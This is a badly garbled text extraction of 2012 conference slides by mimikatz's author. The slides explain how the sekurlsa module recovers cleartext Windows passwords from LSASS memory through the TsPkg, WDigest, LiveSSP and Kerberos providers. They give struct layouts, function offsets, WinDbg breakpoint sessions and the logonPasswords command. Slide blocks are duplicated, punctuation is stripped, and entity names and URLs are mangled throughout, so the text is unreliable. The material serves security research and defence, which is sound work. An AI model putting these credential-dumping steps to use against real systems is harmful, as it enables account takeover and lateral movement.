07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 2 2
mimikatz working
mimikatz working
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3 3
sekurlsadll
mimikatzexe
mimikatzexe
KeyIso laquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLog laquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
mimikatzexe
SamSS laquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipe Write a welcome message Wait commandshellip and return results
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4 4
mimikatzexe
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo mod_mimikatz_nogpo
mod_mimikatz_divers mod_mimikatz_divers
mod_mimikatz_winmine mod_mimikatz_winmine
mod_mimikatz_impersonate mod_mimikatz_impersonate
mod_mimikatz_inject mod_mimikatz_inject
mod_mimikatz_samdump mod_mimikatz_samdump
mod_mimikatz_standard mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle mod_mimikatz_handle
mod_mimikatz_system mod_mimikatz_system
mod_mimikatz_service mod_mimikatz_service
mod_mimikatz_process mod_mimikatz_process
mod_mimikatz_thread mod_mimikatz_thread
mod_mimikatz_terminalserver mod_mimikatz_terminalserver
mod_mimikatz_privilege mod_mimikatz_privilege
mod_pipe mod_pipe
mod_inject mod_inject
mod_memory mod_memory
mod_parseur mod_parseur
mod_patch mod_patch
mod_hive mod_hive
mod_secacl mod_secacl
mod_privilege mod_privilege
mod_process mod_process
mod_service mod_service
mod_system mod_system
mod_thread mod_thread
mod_ts mod_ts
mod_text mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0 msv_1_0
tspkg tspkg
wdigest wdigest
livessp livessp
kerberos kerberos
kappfreedll kappfreedll
kelloworlddll kelloworlddll
klockdll klockdll
mimikatzsys mimikatzsys
sekurlsadll
sam sam
secrets secrets
msv_1_0 msv_1_0
wdigest wdigest
livessp livessp
kerberos kerberos
tspkg tspkg
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
